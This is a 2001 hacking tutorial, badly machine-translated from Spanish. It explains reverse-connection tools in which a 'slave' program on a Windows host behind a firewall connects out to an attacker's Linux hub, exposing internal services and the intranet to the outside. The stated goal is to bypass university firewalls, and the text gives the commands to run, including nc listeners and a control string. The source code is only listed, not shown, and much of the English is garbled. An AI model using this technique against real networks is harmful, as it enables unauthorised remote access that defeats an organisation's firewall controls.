SINCE(AS,LIKE) ACCEDING TO SERVICES IN HOSTS THAT(THAT) ESTAN BEHIND OF PROXYS/NAT/FIREWALLS
E.Sobrino (eid0) 2001
Eid0@micro-electronics
Http: // www.micro-electronica.com
Dedicated to Ru69 and his(its) French net (thank you for testear the program).
This text this written only with didactic ends(purposes). The author neither plays the role to himself responsible for the evil use that can be given to this information, nor becomes responsible for the programs that it(he,she,I) takes(take) included.
If the computer burns you, the whole hard disk resigns or bites a dog on having executed them, you do not claim the author.
The programs close to the code source(fountain) relating to this article can stoop of:
Http: // www.micro-electronica.com/download/cone xinversas.zip
INTRODUCTION
Every time it(he,she) is mas usually to meet computers that alone have gone out for Internet and do not allow next connections. This is owed basically to two motives:
1. Internet IP's lack(mistake) (it(he,she) is to say, that the computer goes under NAT or PROXY) and alone which(who) has a local ip.
2. Firewall's rules that prevent the entry of paketes of connection towards the host.
Like already habreis deduced (and many(many people) verified), these computers only can be used for salient connections of simple protocols, for example to sail for the web, to do ftp's passive (the assets were not working since already it will be discussed), etc..
This fact prevents us having services of any type, and this is what we are going to try(mean) hackear.
AIM(LENS)
Our aim(lens) is to create a program that allows us to accede to the services that exist behind of this hosts. Example practical:
To create servants ftp in any accessible computer of the university from Internet avoiding all the firewalls of the university.
To accede to all the local computers of the university from Internet.
That is to say, we want to accede to all the services of this "secret" hosts from an external computer,
Avoiding all the filters of the firewall or the collateral effects of the NAT and PROXYS.
For this, we are going to need:
To execute a program in one of the hosts that(that) this behind of the proxy/fire that allows us to enter from any place of Internet to all his(its,her) services (http, ftp, etc ...),
This way like to all the services of the hosts of his(its) intranet.
Since age to expect we will need to create also a program in the computer client from whom we want to enter in order that all the programs clients (ftp, mariner(browser,navigating), etc ...) they do not realize the realized change and they do not have to worry of ip's places not at all(nothing,anything) for the style.
From now we will call controller to the computer that has connection to Internet and there wants to be connected to a computer that this behind of a proxy/fire. We will call slave to the computer that this behind of the proxy/fire.
The beginning(principle) of functioning is simple, the slave was connected to the controller with a salient connection that avoids the local firewalls. From this moment the controller across this connection dara mandates to the slave to receive mas connections to the local ports that it(he,she,I) wants(want) and from the host and remote port that it(he,she,I) gives(give) the orders.
Besides we will implement the programs in order that they are cliente/servidor, multithreaded and of permanent connection to use an only connection for all kinds of services and with multiple connections and with(in spite of) multiple different slaves,
Also we will monitor well the reconnection of this principal connection, since it is only one bow that joins us with the slaves.
To begin we will implement the control program for linux, and the program slave for computers that traverse Windows 9X/NT/2000, since they are what normally we are going to be in all sites(places).
Before beginning in task, to follow(continue) this article vais to needing a very simple and very useful application used from time there is in systems UNIX and carried recently to Windows for the extraordinary group Lopht. lower it free of his(its) page.
The program servant of linux has as name server.c, a daemon consists that recogera all the connections of the slaves and also of the clients and hara of intercommunicator between(among) them.
The programs clients of windows have as name pilladorftp.c (totally inappropriate name as which it(he,she) does not have anything that(that) to see with the ftp) and datapipeinverso.c. The program pilladorftp.c establecera the principal connection with the controller and when it(he,she,I) receives(receive) a mandate it(he,she) was calling to datapipeinverso in order that bouncee the connection to where the controller is said to him(her).
The better(best) thing to understand the functioning is to see the example:
EXAMPLE OF FUNCTIONING
The programs of windows have to get together into the same directory(board of directors).
Example:
Servant: ip = 200.200.200.200
Slave: ip place = 192.168.0.1
Gateway = 201.201.201.201
We are going to accede to the service telnet of the slave from any point of Internet for it do:
In the linux:
Server 7000 (the program was listening in 7000 to slaves' connections)
In the Windows:
Pilladorftp 200.200.200.200 (the windows throws a connection to the servant to receive orders)
Already we have the principal communication, now us we can dedicate to accede to services.
In linux:
Nc-l-p 8000-v
And in another shell:
Nc 127.0.0.1 7000
And we write(wrote) the following thing:
CONTROL201.201.201.201REDIRECCIONAPUERT O200.200.200.2000800000023127.000.000.0 01 [INTRO]
On having done this we will see since us the service appears in the shell of the port 8000 telnet from which(whom) already we will be able to accede.
The explanation of the judgment of control ke comes to him(her) to the controller it is the following one:
CONTROL (IP-esclavo-gtway) REDIRECCIONAPUERTO (IP-server (portserver (puertolocal (hostbounce)
The ips contendran always 15 digits and the ports always 5 digits.
PROTOCOLS OF SPECIAL SERVANTS (FTP)
There are protocols as the ftp where there is information of the protocol of net in the protocol of application, this evidently gives problems in the firewalls and in many routers that alone treat IP.
For this type of protocols the control program has to be made(become) special in order that it(he,she,I) extracts(extract) all the information of net from the information. This can be seen in the code source(fountain) of the program emuladorftp.c that also I implemented to accede to services ftp in the hosts slaves. This program supports the connections PASV of the ftp creating new connections...
The functioning serious the following one:
Example:
Servant: ip = 200.200.200.200
Slave: ip place = 192.168.0.1
Gateway = 201.201.201.201
In the linux:
Server 7000 (the program was listening in 7000 to slaves' connections)
In the Windows:
Pilladorftp 200.200.200.200 (the windows throws a connection to the servant to receive orders)
Already we have the principal communication, now us we can dedicate to accede to the service ftp.
Emuladorftp 200.200.200.200 9000 201.201.201.201 21
And now to accede to the ftp of the alone slave we have to do a ftp to: ftp 200.200.200.200 9000
Or also
Ftp 127.0.0.1 9000
Any client can use of ftp and any number of meetings....
These programs close to the code source(fountain) can stoop of:
Http: // www.micro-electronica.com/download/cone xinversas.zip
Any feedback, alterations and constructive contributions, send them to: eid0@micro-electronica.com
CODE SOURCE(FOUNTAIN)
Servant Hub Multithreaded Multihost, runs in Linux
Slave, runs in Windows
Main slave who entrusts carrying out the salient connection.
Emulator Server ftp of passive connections, it(he,she) runs in Linux
Scanner of hosts of intranet, loggea all the banners of the ports of the specified hosts CLASSIFIED
If someone carries to Windows the hub and the emulator, podriais to send it in order that it(he,she,I) hangs(hang) it here.